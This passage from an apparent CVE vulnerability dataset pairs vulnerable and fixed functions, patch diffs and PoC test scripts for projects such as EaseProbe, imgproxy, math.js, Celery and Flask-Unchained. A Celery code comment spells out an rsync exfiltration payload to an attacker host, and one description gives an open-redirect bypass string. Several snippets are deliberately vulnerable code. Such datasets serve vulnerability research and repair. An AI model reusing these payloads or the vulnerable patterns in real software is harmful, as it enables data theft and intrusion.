a/src/util/normalize-manifest/fix.js\n+++ b/src/util/normalize-manifest/fix.js\n@@ -132,6 +132,24 @@\n // Remove scoped package name for consistency with NPM's bin field fixing behaviour\n const name = info.name.replace(/^@[^\\/]+\\//, '');\n info.bin = {[name]: info.bin};\n+ }\n+\n+ // Validate that the bin entries reference only files within their package, and that\n+ // their name is a valid file name\n+ if (typeof info.bin === 'object' && info.bin !== null) {\n+ const bin: Object = info.bin;\n+ for (const key of Object.keys(bin)) {\n+ const target = bin[key];\n+ if (!VALID_BIN_KEYS.test(key) || !isValidBin(target)) {\n+ delete bin[key];\n+ warn(reporter.lang('invalidBinEntry', info.name, key));\n+ } else {\n+ bin[key] = path.normalize(target);\n+ }\n+ }\n+ } else if (typeof info.bin !== 'undefined') {\n+ delete info.bin;\n+ warn(reporter.lang('invalidBinField', info.name));\n }\n \n // bundleDependencies is an alias for bundledDependencies\n\n--- /dev/null\n+++ b/src/util/normalize-manifest/fix.js\n@@ -0,0 +1 @@\n+const VALID_BIN_KEYS = /^[a-z0-9_-]+$/i;\n\n--- /dev/null\n+++ b/src/util/normalize-manifest/fix.js\n@@ -0,0 +1 @@\n+const PARENT_PATH = /^\\.\\.([\\\\\\/]|$)/;\n\n--- /dev/null\n+++ b/src/util/normalize-manifest/fix.js\n@@ -0,0 +1,3 @@\n+export function isValidBin(bin: string): boolean {\n+ return !path.isAbsolute(bin) && !PARENT_PATH.test(path.normalize(bin));\n+}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-33967", "cve_description": "EaseProbe is a tool that can do health/status checking. An SQL injection issue was discovered in EaseProbe before 2.1.0 when using MySQL/PostgreSQL data checking. This problem has been fixed in v2.1.0.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/megaease/easeprobe", "patch_url": ["https://github.com/megaease/easeprobe/commit/caaf5860df2aaa76acd29bc40ec9a578d0b1d6e1"], "programing_language": "Go", "vul_func": [{"id": "vul_go_26_2", "commit": "0e148b8", "file_path": "probe/client/mysql/mysql.go", "start_line": 156, "end_line": 176, "snippet": "func (r *MySQL) getSQL(str string) (string, error) {\n\tif len(strings.TrimSpace(str)) == 0 {\n\t\treturn \"\", fmt.Errorf(\"Empty SQL data\")\n\t}\n\tfields := strings.Split(str, \":\")\n\tif len(fields) != 5 {\n\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s]. 
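The Yarn patch shown in the diff above filters every bin entry twice: the key must be a plain file name (VALID_BIN_KEYS) and the target must stay inside the package after normalization (isValidBin). A compact Python rendering of both predicates follows; os.path.normpath differs slightly from Node's path.normalize, and the string-to-object bin expansion step is omitted, so treat this as a sketch.

import os
import re

VALID_BIN_KEY = re.compile(r"^[a-z0-9_-]+$", re.IGNORECASE)

def is_valid_bin(target):
    # Reject absolute paths and anything still pointing at a parent
    # directory after normalization (e.g. 'a/../../evil').
    norm = os.path.normpath(target)
    return (not os.path.isabs(norm)
            and norm != ".."
            and not norm.startswith(".." + os.sep))

def fix_bin_field(manifest):
    bin_field = manifest.get("bin")
    if not isinstance(bin_field, dict):
        manifest.pop("bin", None)      # non-object bin fields are dropped
        return
    for key in list(bin_field):
        if not VALID_BIN_KEY.match(key) or not is_valid_bin(bin_field[key]):
            del bin_field[key]         # never create a link for this entry
        else:
            bin_field[key] = os.path.normpath(bin_field[key])

pkg = {"bin": {"ok": "./cli.js", "bad": "../../outside", "../x": "a.js"}}
fix_bin_field(pkg)
print(pkg)  # {'bin': {'ok': 'cli.js'}}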
(syntax: database:table:field:key:value)\", str)\n\t}\n\tdb := fields[0]\n\ttable := fields[1]\n\tfield := fields[2]\n\tkey := fields[3]\n\tvalue := fields[4]\n\t//check value is int or not\n\tif _, err := strconv.Atoi(value); err != nil {\n\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s], the value must be int\", str)\n\t}\n\n\tsql := fmt.Sprintf(\"SELECT %s FROM %s.%s WHERE %s = %s\", field, db, table, key, value)\n\treturn sql, nil\n}"}], "fix_func": [{"id": "fix_go_26_1", "commit": "caaf586", "file_path": "probe/client/mysql/mysql.go", "start_line": 171, "end_line": 191, "snippet": "func (r *MySQL) getSQL(str string) (string, error) {\n\tif len(strings.TrimSpace(str)) == 0 {\n\t\treturn \"\", fmt.Errorf(\"Empty SQL data\")\n\t}\n\tfields := strings.Split(str, \":\")\n\tif len(fields) != 5 {\n\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s]. (syntax: database:table:field:key:value)\", str)\n\t}\n\tdb := global.EscapeQuote(fields[0])\n\ttable := global.EscapeQuote(fields[1])\n\tfield := global.EscapeQuote(fields[2])\n\tkey := global.EscapeQuote(fields[3])\n\tvalue := global.EscapeQuote(fields[4])\n\t//check value is int or not\n\tif _, err := strconv.Atoi(value); err != nil {\n\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s], the value must be int\", str)\n\t}\n\n\tsql := fmt.Sprintf(\"SELECT `%s` FROM `%s`.`%s` WHERE `%s` = %s\", field, db, table, key, value)\n\treturn sql, nil\n}"}, {"id": "fix_go_26_2", "commit": "caaf586", "file_path": "global/global.go", "start_line": 314, "end_line": 332, "snippet": "\n// EscapeQuote escape the string the single quote, double quote, and backtick\nfunc EscapeQuote(str string) string {\n\ttype Escape struct {\n\t\tFrom string\n\t\tTo string\n\t}\n\tescape := []Escape{\n\t\t{From: \"`\", To: \"\"}, // remove the backtick\n\t\t{From: `\\`, To: `\\\\`},\n\t\t{From: `'`, To: `\\'`},\n\t\t{From: `\"`, To: `\\\"`},\n\t}\n\n\tfor _, e := range escape {\n\t\tstr = strings.ReplaceAll(str, e.From, e.To)\n\t}\n\treturn str\n}"}], "vul_patch": "--- a/probe/client/mysql/mysql.go\n+++ b/global/global.go\n@@ -1,21 +1,19 @@\n-func (r *MySQL) getSQL(str string) (string, error) {\n-\tif len(strings.TrimSpace(str)) == 0 {\n-\t\treturn \"\", fmt.Errorf(\"Empty SQL data\")\n+\n+// EscapeQuote escape the string the single quote, double quote, and backtick\n+func EscapeQuote(str string) string {\n+\ttype Escape struct {\n+\t\tFrom string\n+\t\tTo string\n \t}\n-\tfields := strings.Split(str, \":\")\n-\tif len(fields) != 5 {\n-\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s]. 
(syntax: database:table:field:key:value)\", str)\n-\t}\n-\tdb := fields[0]\n-\ttable := fields[1]\n-\tfield := fields[2]\n-\tkey := fields[3]\n-\tvalue := fields[4]\n-\t//check value is int or not\n-\tif _, err := strconv.Atoi(value); err != nil {\n-\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s], the value must be int\", str)\n+\tescape := []Escape{\n+\t\t{From: \"`\", To: \"\"}, // remove the backtick\n+\t\t{From: `\\`, To: `\\\\`},\n+\t\t{From: `'`, To: `\\'`},\n+\t\t{From: `\"`, To: `\\\"`},\n \t}\n \n-\tsql := fmt.Sprintf(\"SELECT %s FROM %s.%s WHERE %s = %s\", field, db, table, key, value)\n-\treturn sql, nil\n+\tfor _, e := range escape {\n+\t\tstr = strings.ReplaceAll(str, e.From, e.To)\n+\t}\n+\treturn str\n }\n\n--- /dev/null\n+++ b/global/global.go\n@@ -0,0 +1,21 @@\n+func (r *MySQL) getSQL(str string) (string, error) {\n+\tif len(strings.TrimSpace(str)) == 0 {\n+\t\treturn \"\", fmt.Errorf(\"Empty SQL data\")\n+\t}\n+\tfields := strings.Split(str, \":\")\n+\tif len(fields) != 5 {\n+\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s]. (syntax: database:table:field:key:value)\", str)\n+\t}\n+\tdb := global.EscapeQuote(fields[0])\n+\ttable := global.EscapeQuote(fields[1])\n+\tfield := global.EscapeQuote(fields[2])\n+\tkey := global.EscapeQuote(fields[3])\n+\tvalue := global.EscapeQuote(fields[4])\n+\t//check value is int or not\n+\tif _, err := strconv.Atoi(value); err != nil {\n+\t\treturn \"\", fmt.Errorf(\"Invalid SQL data - [%s], the value must be int\", str)\n+\t}\n+\n+\tsql := fmt.Sprintf(\"SELECT `%s` FROM `%s`.`%s` WHERE `%s` = %s\", field, db, table, key, value)\n+\treturn sql, nil\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-33967:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/easeprobe\ngit apply --ignore-whitespace --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ngo test -timeout 30s -run ^TestGetSQL$ github.com/megaease/easeprobe/probe/client/mysql\n", "unit_test_cmd": null} {"cve_id": "CVE-2025-24354", "cve_description": "imgproxy is server for resizing, processing, and converting images. Imgproxy does not block the 0.0.0.0 address, even with IMGPROXY_ALLOW_LOOPBACK_SOURCE_ADDRESSES set to false. This can expose services on the local host. 
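The easeprobe fix above stacks three defenses: the value must parse as an integer, identifiers are backtick-quoted in the generated SQL, and backticks inside identifiers are stripped so they can never close the quoting. The same construction in Python, where escape_ident approximates only the backtick-removal part of the Go EscapeQuote helper:

def escape_ident(s):
    # Strip backticks so an identifier can never close its own quoting;
    # the Go EscapeQuote() also escapes \, ' and " for other contexts.
    return s.replace("`", "")

def build_query(spec):
    parts = spec.split(":")
    if len(parts) != 5:
        raise ValueError("syntax: database:table:field:key:value")
    db, table, field, key, value = (escape_ident(p) for p in parts)
    int(value)  # raises ValueError unless the value is an integer literal
    return f"SELECT `{field}` FROM `{db}`.`{table}` WHERE `{key}` = {value}"

print(build_query("test:users:id:age:42"))
# SELECT `id` FROM `test`.`users` WHERE `age` = 42
# build_query("test:users:id:age:1 OR 1=1")  -> ValueError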
This vulnerability is fixed in 3.27.2.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/imgproxy/imgproxy", "patch_url": ["https://github.com/imgproxy/imgproxy/commit/3d4fed6842aa8930ec224d0ad75b0079b858e081"], "programing_language": "Go", "vul_func": [{"id": "vul_go_95_1", "commit": "09e305c", "file_path": "security/source.go", "start_line": 33, "end_line": 57, "snippet": "func VerifySourceNetwork(addr string) error {\n\thost, _, err := net.SplitHostPort(addr)\n\tif err != nil {\n\t\thost = addr\n\t}\n\n\tip := net.ParseIP(host)\n\tif ip == nil {\n\t\treturn ErrInvalidSourceAddress\n\t}\n\n\tif !config.AllowLoopbackSourceAddresses && ip.IsLoopback() {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\tif !config.AllowLinkLocalSourceAddresses && (ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast()) {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\tif !config.AllowPrivateSourceAddresses && ip.IsPrivate() {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_95_1", "commit": "3d4fed6", "file_path": "security/source.go", "start_line": 33, "end_line": 57, "snippet": "func VerifySourceNetwork(addr string) error {\n\thost, _, err := net.SplitHostPort(addr)\n\tif err != nil {\n\t\thost = addr\n\t}\n\n\tip := net.ParseIP(host)\n\tif ip == nil {\n\t\treturn ErrInvalidSourceAddress\n\t}\n\n\tif !config.AllowLoopbackSourceAddresses && (ip.IsLoopback() || ip.IsUnspecified()) {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\tif !config.AllowLinkLocalSourceAddresses && (ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast()) {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\tif !config.AllowPrivateSourceAddresses && ip.IsPrivate() {\n\t\treturn ErrSourceAddressNotAllowed\n\t}\n\n\treturn nil\n}"}], "vul_patch": "--- a/security/source.go\n+++ b/security/source.go\n@@ -9,7 +9,7 @@\n \t\treturn ErrInvalidSourceAddress\n \t}\n \n-\tif !config.AllowLoopbackSourceAddresses && ip.IsLoopback() {\n+\tif !config.AllowLoopbackSourceAddresses && (ip.IsLoopback() || ip.IsUnspecified()) {\n \t\treturn ErrSourceAddressNotAllowed\n \t}\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2017-1001002", "cve_description": "math.js before 3.17.0 had an arbitrary code execution in the JavaScript engine. 
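The imgproxy patch above adds ip.IsUnspecified() so that 0.0.0.0 and :: are treated like loopback, since connecting to the unspecified address reaches local services on most platforms. Python's ipaddress module exposes predicates roughly corresponding to the Go net.IP methods; a sketch of the fixed check:

import ipaddress

def verify_source(host, allow_loopback=False, allow_link_local=False,
                  allow_private=False):
    ip = ipaddress.ip_address(host)  # ValueError for non-literal hosts
    if not allow_loopback and (ip.is_loopback or ip.is_unspecified):
        return False  # is_unspecified is the new clause: 0.0.0.0 and ::
    if not allow_link_local and ip.is_link_local:
        return False
    if not allow_private and ip.is_private:
        return False
    return True

print(verify_source("0.0.0.0"))    # False: the CVE-2025-24354 bypass address
print(verify_source("127.0.0.1"))  # False
print(verify_source("8.8.8.8"))    # True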
Creating a typed function with JavaScript code in the name could result arbitrary execution.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/josdejong/mathjs", "patch_url": ["https://github.com/josdejong/mathjs/commit/8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_102_1", "commit": "4a93787", "file_path": "lib/expression/parse.js", "start_line": 576, "end_line": 621, "snippet": " function parseAssignment () {\n var name, args, value, valid;\n\n var node = parseConditional();\n\n if (token == '=') {\n if (type.isSymbolNode(node)) {\n // parse a variable assignment like 'a = 2/3'\n name = node.name;\n getTokenSkipNewline();\n value = parseAssignment();\n return new AssignmentNode(new SymbolNode(name), value);\n }\n else if (type.isAccessorNode(node)) {\n // parse a matrix subset assignment like 'A[1,2] = 4'\n getTokenSkipNewline();\n value = parseAssignment();\n return new AssignmentNode(node.object, node.index, value);\n }\n else if (type.isFunctionNode(node)) {\n // parse function assignment like 'f(x) = x^2'\n valid = true;\n args = [];\n\n name = node.name;\n node.args.forEach(function (arg, index) {\n if (type.isSymbolNode(arg)) {\n args[index] = arg.name;\n }\n else {\n valid = false;\n }\n });\n\n if (valid) {\n getTokenSkipNewline();\n value = parseAssignment();\n return new FunctionAssignmentNode(name, args, value);\n }\n }\n\n throw createSyntaxError('Invalid left hand side of assignment operator =');\n }\n\n return node;\n }"}], "fix_func": [{"id": "fix_js_102_1", "commit": "8d2d48d", "file_path": "lib/expression/parse.js", "start_line": 576, "end_line": 621, "snippet": " function parseAssignment () {\n var name, args, value, valid;\n\n var node = parseConditional();\n\n if (token == '=') {\n if (type.isSymbolNode(node)) {\n // parse a variable assignment like 'a = 2/3'\n name = node.name;\n getTokenSkipNewline();\n value = parseAssignment();\n return new AssignmentNode(new SymbolNode(name), value);\n }\n else if (type.isAccessorNode(node)) {\n // parse a matrix subset assignment like 'A[1,2] = 4'\n getTokenSkipNewline();\n value = parseAssignment();\n return new AssignmentNode(node.object, node.index, value);\n }\n else if (type.isFunctionNode(node) && type.isSymbolNode(node.fn)) {\n // parse function assignment like 'f(x) = x^2'\n valid = true;\n args = [];\n\n name = node.name;\n 
node.args.forEach(function (arg, index) {\n if (type.isSymbolNode(arg)) {\n args[index] = arg.name;\n }\n else {\n valid = false;\n }\n });\n\n if (valid) {\n getTokenSkipNewline();\n value = parseAssignment();\n return new FunctionAssignmentNode(name, args, value);\n }\n }\n\n throw createSyntaxError('Invalid left hand side of assignment operator =');\n }\n\n return node;\n }"}], "vul_patch": "--- a/lib/expression/parse.js\n+++ b/lib/expression/parse.js\n@@ -17,7 +17,7 @@\n value = parseAssignment();\n return new AssignmentNode(node.object, node.index, value);\n }\n- else if (type.isFunctionNode(node)) {\n+ else if (type.isFunctionNode(node) && type.isSymbolNode(node.fn)) {\n // parse function assignment like 'f(x) = x^2'\n valid = true;\n args = [];\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23727", "cve_description": "This affects the package celery before 5.2.2. It by default trusts the messages and metadata stored in backends (result stores). When reading task metadata from the backend, the data is deserialized. Given that an attacker can gain access to, or somehow manipulate the metadata within a celery backend, they could trigger a stored command injection vulnerability and potentially gain further access to the system.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/celery/celery", "patch_url": ["https://github.com/celery/celery/commit/1f7ad7e6df1e02039b6ab9eec617d283598cad6b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_41_1", "commit": "2d8dbc2", "file_path": "celery/backends/base.py", "start_line": 339, "end_line": 369, "snippet": " def exception_to_python(self, exc):\n \"\"\"Convert serialized exception to Python exception.\"\"\"\n if exc:\n if not isinstance(exc, BaseException):\n exc_module = exc.get('exc_module')\n if exc_module is None:\n cls = create_exception_cls(\n from_utf8(exc['exc_type']), __name__)\n else:\n exc_module = from_utf8(exc_module)\n exc_type = from_utf8(exc['exc_type'])\n try:\n # Load module and find exception class in that\n cls = sys.modules[exc_module]\n # The type can contain qualified name with parent classes\n for name in exc_type.split('.'):\n cls = getattr(cls, name)\n except (KeyError, AttributeError):\n cls = create_exception_cls(exc_type,\n celery.exceptions.__name__)\n exc_msg = exc['exc_message']\n try:\n if isinstance(exc_msg, (tuple, list)):\n exc = cls(*exc_msg)\n else:\n exc 
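The math.js fix above tightens the parser so that a function assignment f(x) = body is only accepted when the callee is a bare symbol, not an arbitrary expression whose name could carry code into the compiler. The same shape check against a toy AST, with node classes invented purely for illustration:

from dataclasses import dataclass, field

@dataclass
class SymbolNode:
    name: str

@dataclass
class FunctionNode:
    fn: object                          # the callee expression
    args: list = field(default_factory=list)

def parse_function_assignment(node):
    # Pre-fix, an isFunctionNode(node) check alone was enough; post-fix the
    # callee must also be a bare symbol, so a callee that is itself an
    # expression is rejected instead of compiled.
    if not (isinstance(node, FunctionNode) and isinstance(node.fn, SymbolNode)):
        raise SyntaxError("Invalid left hand side of assignment operator =")
    if not all(isinstance(a, SymbolNode) for a in node.args):
        raise SyntaxError("Invalid left hand side of assignment operator =")
    return node.fn.name, [a.name for a in node.args]

print(parse_function_assignment(FunctionNode(SymbolNode("f"), [SymbolNode("x")])))
# ('f', ['x'])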
= cls(exc_msg)\n except Exception as err: # noqa\n exc = Exception(f'{cls}({exc_msg})')\n if self.serializer in EXCEPTION_ABLE_CODECS:\n exc = get_pickled_exception(exc)\n return exc"}], "fix_func": [{"id": "fix_py_41_1", "commit": "1f7ad7e", "file_path": "celery/backends/base.py", "start_line": 340, "end_line": 409, "snippet": " def exception_to_python(self, exc):\n \"\"\"Convert serialized exception to Python exception.\"\"\"\n if not exc:\n return None\n elif isinstance(exc, BaseException):\n if self.serializer in EXCEPTION_ABLE_CODECS:\n exc = get_pickled_exception(exc)\n return exc\n elif not isinstance(exc, dict):\n try:\n exc = dict(exc)\n except TypeError as e:\n raise TypeError(f\"If the stored exception isn't an \"\n f\"instance of \"\n f\"BaseException, it must be a dictionary.\\n\"\n f\"Instead got: {exc}\") from e\n\n exc_module = exc.get('exc_module')\n try:\n exc_type = exc['exc_type']\n except KeyError as e:\n raise ValueError(\"Exception information must include\"\n \"the exception type\") from e\n if exc_module is None:\n cls = create_exception_cls(\n exc_type, __name__)\n else:\n try:\n # Load module and find exception class in that\n cls = sys.modules[exc_module]\n # The type can contain qualified name with parent classes\n for name in exc_type.split('.'):\n cls = getattr(cls, name)\n except (KeyError, AttributeError):\n cls = create_exception_cls(exc_type,\n celery.exceptions.__name__)\n exc_msg = exc.get('exc_message', '')\n\n # If the recreated exception type isn't indeed an exception,\n # this is a security issue. Without the condition below, an attacker\n # could exploit a stored command vulnerability to execute arbitrary\n # python code such as:\n # os.system(\"rsync /data attacker@192.168.56.100:~/data\")\n # The attacker sets the task's result to a failure in the result\n # backend with the os as the module, the system function as the\n # exception type and the payload\n # rsync /data attacker@192.168.56.100:~/data\n # as the exception arguments like so:\n # {\n # \"exc_module\": \"os\",\n # \"exc_type\": \"system\",\n # \"exc_message\": \"rsync /data attacker@192.168.56.100:~/data\"\n # }\n if not isinstance(cls, type) or not issubclass(cls, BaseException):\n fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'\n raise SecurityError(\n f\"Expected an exception class, got {fake_exc_type} with payload {exc_msg}\")\n\n # XXX: Without verifying `cls` is actually an exception class,\n # an attacker could execute arbitrary python code.\n # cls could be anything, even eval().\n try:\n if isinstance(exc_msg, (tuple, list)):\n exc = cls(*exc_msg)\n else:\n exc = cls(exc_msg)\n except Exception as err: # noqa\n exc = Exception(f'{cls}({exc_msg})')\n\n return exc"}], "vul_patch": "--- a/celery/backends/base.py\n+++ b/celery/backends/base.py\n@@ -1,31 +1,70 @@\n def exception_to_python(self, exc):\n \"\"\"Convert serialized exception to Python exception.\"\"\"\n- if exc:\n- if not isinstance(exc, BaseException):\n- exc_module = exc.get('exc_module')\n- if exc_module is None:\n- cls = create_exception_cls(\n- from_utf8(exc['exc_type']), __name__)\n- else:\n- exc_module = from_utf8(exc_module)\n- exc_type = from_utf8(exc['exc_type'])\n- try:\n- # Load module and find exception class in that\n- cls = sys.modules[exc_module]\n- # The type can contain qualified name with parent classes\n- for name in exc_type.split('.'):\n- cls = getattr(cls, name)\n- except (KeyError, AttributeError):\n- cls = create_exception_cls(exc_type,\n- 
celery.exceptions.__name__)\n- exc_msg = exc['exc_message']\n- try:\n- if isinstance(exc_msg, (tuple, list)):\n- exc = cls(*exc_msg)\n- else:\n- exc = cls(exc_msg)\n- except Exception as err: # noqa\n- exc = Exception(f'{cls}({exc_msg})')\n+ if not exc:\n+ return None\n+ elif isinstance(exc, BaseException):\n if self.serializer in EXCEPTION_ABLE_CODECS:\n exc = get_pickled_exception(exc)\n+ return exc\n+ elif not isinstance(exc, dict):\n+ try:\n+ exc = dict(exc)\n+ except TypeError as e:\n+ raise TypeError(f\"If the stored exception isn't an \"\n+ f\"instance of \"\n+ f\"BaseException, it must be a dictionary.\\n\"\n+ f\"Instead got: {exc}\") from e\n+\n+ exc_module = exc.get('exc_module')\n+ try:\n+ exc_type = exc['exc_type']\n+ except KeyError as e:\n+ raise ValueError(\"Exception information must include\"\n+ \"the exception type\") from e\n+ if exc_module is None:\n+ cls = create_exception_cls(\n+ exc_type, __name__)\n+ else:\n+ try:\n+ # Load module and find exception class in that\n+ cls = sys.modules[exc_module]\n+ # The type can contain qualified name with parent classes\n+ for name in exc_type.split('.'):\n+ cls = getattr(cls, name)\n+ except (KeyError, AttributeError):\n+ cls = create_exception_cls(exc_type,\n+ celery.exceptions.__name__)\n+ exc_msg = exc.get('exc_message', '')\n+\n+ # If the recreated exception type isn't indeed an exception,\n+ # this is a security issue. Without the condition below, an attacker\n+ # could exploit a stored command vulnerability to execute arbitrary\n+ # python code such as:\n+ # os.system(\"rsync /data attacker@192.168.56.100:~/data\")\n+ # The attacker sets the task's result to a failure in the result\n+ # backend with the os as the module, the system function as the\n+ # exception type and the payload\n+ # rsync /data attacker@192.168.56.100:~/data\n+ # as the exception arguments like so:\n+ # {\n+ # \"exc_module\": \"os\",\n+ # \"exc_type\": \"system\",\n+ # \"exc_message\": \"rsync /data attacker@192.168.56.100:~/data\"\n+ # }\n+ if not isinstance(cls, type) or not issubclass(cls, BaseException):\n+ fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'\n+ raise SecurityError(\n+ f\"Expected an exception class, got {fake_exc_type} with payload {exc_msg}\")\n+\n+ # XXX: Without verifying `cls` is actually an exception class,\n+ # an attacker could execute arbitrary python code.\n+ # cls could be anything, even eval().\n+ try:\n+ if isinstance(exc_msg, (tuple, list)):\n+ exc = cls(*exc_msg)\n+ else:\n+ exc = cls(exc_msg)\n+ except Exception as err: # noqa\n+ exc = Exception(f'{cls}({exc_msg})')\n+\n return exc\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23727:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/celery\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2021-23727/bin/python -m pytest t/unit/backends/test_base.py::test_BaseBackend_dict::test_not_an_exception_but_a_callable t/unit/backends/test_base.py::test_BaseBackend_dict::test_not_an_exception_but_another_object -p no:warning --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23727:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/celery\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2021-23727/bin/python -m pytest t/unit/backends/test_base.py -p no:warning --disable-warnings\n"} {"cve_id": "CVE-2021-23393", "cve_description": "This affects the package Flask-Unchained before 
0.9.0. When using the _validate_redirect_url function, it is possible to bypass URL validation and redirect a user to an arbitrary URL by providing multiple backslashes such as \\\\\\evil.com/path. This vulnerability is only exploitable if an alternative WSGI server other than Werkzeug is used, or the default behaviour of Werkzeug is modified using 'autocorrect_location_header=False'.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/briancappello/flask-unchained", "patch_url": ["https://github.com/briancappello/flask-unchained/commit/71e36b28166f9ffbe0a991f51127f0984f7e6a40", "https://github.com/briancappello/flask-unchained/commit/2bfeedf1bc31df851cab8c66df0c432b10406aad"], "programing_language": "Python", "vul_func": [{"id": "vul_py_202_1", "commit": "2bfeedf", "file_path": "flask_unchained/bundles/controller/utils.py", "start_line": 186, "end_line": 188, "snippet": "def encode_non_url_reserved_characters(url):\n    # safe url reserved characters: https://datatracker.ietf.org/doc/html/rfc3986#section-2.2\n    return urlquote(url, safe=\":/?#[]@!$&'()*+,;=\")"}], "fix_func": [{"id": "fix_py_202_1", "commit": "71e36b2", "file_path": "flask_unchained/bundles/controller/utils.py", "start_line": 186, "end_line": 188, "snippet": "def encode_non_url_reserved_characters(url):\n    # safe url reserved characters: https://datatracker.ietf.org/doc/html/rfc3986#section-2.2\n    return urlquote(url, safe=\":/?#[]@!$&'()*+,;=<>\")"}], "vul_patch": "--- a/flask_unchained/bundles/controller/utils.py\n+++ b/flask_unchained/bundles/controller/utils.py\n@@ -1,3 +1,3 @@\n def encode_non_url_reserved_characters(url):\n     # safe url reserved characters: https://datatracker.ietf.org/doc/html/rfc3986#section-2.2\n-    return urlquote(url, safe=\":/?#[]@!$&'()*+,;=\")\n+    return urlquote(url, safe=\":/?#[]@!$&'()*+,;=<>\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2015-5159", "cve_description": "python-kdcproxy before 0.3.2 allows remote attackers to cause a denial of service via a large POST request.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n          not validate or incorrectly validates that the input has the\n          properties that are required to process the data safely and\n          correctly."}}, "repo": "https://github.com/latchset/kdcproxy", "patch_url": ["https://github.com/latchset/kdcproxy/commit/f274aa6787cb8b3ec1cc12c440a56665b7231882"], "programing_language": "Python", "vul_func": [{"id": "vul_py_315_1", "commit": "e4a7119", "file_path": "kdcproxy/__init__.py", "start_line": "172", "end_line": "276", "snippet": "    def __call__(self, env, start_response):\n        try:\n            # Validate the method\n            method = env[\"REQUEST_METHOD\"].upper()\n            if method != \"POST\":\n                raise HTTPException(405, \"Method not allowed (%s).\" % method)\n\n            # Parse the request\n            try:\n                length = int(env[\"CONTENT_LENGTH\"])\n            except AttributeError:\n                length = -1\n            try:\n                pr = codec.decode(env[\"wsgi.input\"].read(length))\n            except codec.ParsingError as e:\n                raise HTTPException(400, e.message)\n\n            # Find the remote proxy\n            servers = self.__resolver.lookup(\n                pr.realm,\n                kpasswd=isinstance(pr, codec.KPASSWDProxyRequest)\n            )\n            if not servers:\n                raise HTTPException(503, \"Can't find remote (%s).\" % pr)\n\n            # Contact the remote server\n            reply = None\n            
